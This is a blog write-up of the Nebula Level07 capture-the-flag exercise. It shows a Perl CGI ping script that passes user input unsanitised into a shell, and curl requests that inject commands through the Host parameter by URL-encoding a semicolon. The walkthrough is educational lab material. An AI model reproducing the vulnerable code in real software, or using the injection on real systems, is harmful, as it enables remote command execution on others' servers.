Mike-Boya

Information Security and Programming Blog

Exploit Exercises - Nebula Level07

The next level provides us with some perl code:

    #!/usr/bin/perl

    use CGI qw{param};

    print "Content-type: text/html\n\n";

    sub ping {
    $host = $_[0];

    print("<html><head><title>Ping results</title></head><body><pre>");

    @output = `ping -c 3 $host 2>&1`;
    foreach $line (@output) { print "$line"; }

    print("</pre></body></html>");

    }

    # check if Host set. if not, display normal page, etc

    ping(param("Host"));

After logging into the system, I looked at the home directory for flag07:

    level07@nebula:/home/flag07$ ls -l
    total 5
    -rwxr-xr-x 1 root root  368 2011-11-20 21:22 index.cgi
    -rw-r--r-- 1 root root 3719 2011-11-20 21:22 thttpd.conf

It appears that the perl code provided is running on a web server. I investigated the contents of thttpd.conf to glean some more information:

    # Specifies an alternate port number to listen on.
    port=7007

    # Specifies what user to switch to after initialization when started as root.
    user=flag07

The config file reveals that the web server is running on port 7007 as the flag07 user.

    $ curl http://192.168.98.138:7007/index.cgi
    <html><head><title>Ping results</title></head><body><pre>Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
        [-p pattern] [-s packetsize] [-t ttl] [-I interface]
        [-M pmtudisc-hint] [-m mark] [-S sndbuf]
        [-T tstamp-options] [-Q tos] [hop1 ...] destination

A quick curl command confirms that the web server is up, accessible, and running the perl ping code.

The code does not appear to be performing any input validation so lets try sending a semi-colon and an additional command at the Host parameter:

    $ curl http://192.168.98.138:7007/index.cgi?Host=%3B%20pwd
    <html><head><title>Ping results</title></head><body><pre>/home/flag07

Awesome! As you can see in the output, we can inject and run commands. Since the web server is running as flag07, let’s run getflag.

    $ curl http://192.168.98.138:7007/index.cgi?Host=%3B%20getflag
    <html><head><title>Ping results</title></head><body><pre>You have successfully executed getflag on a target account

The command executed successfully. On to level08!

Mike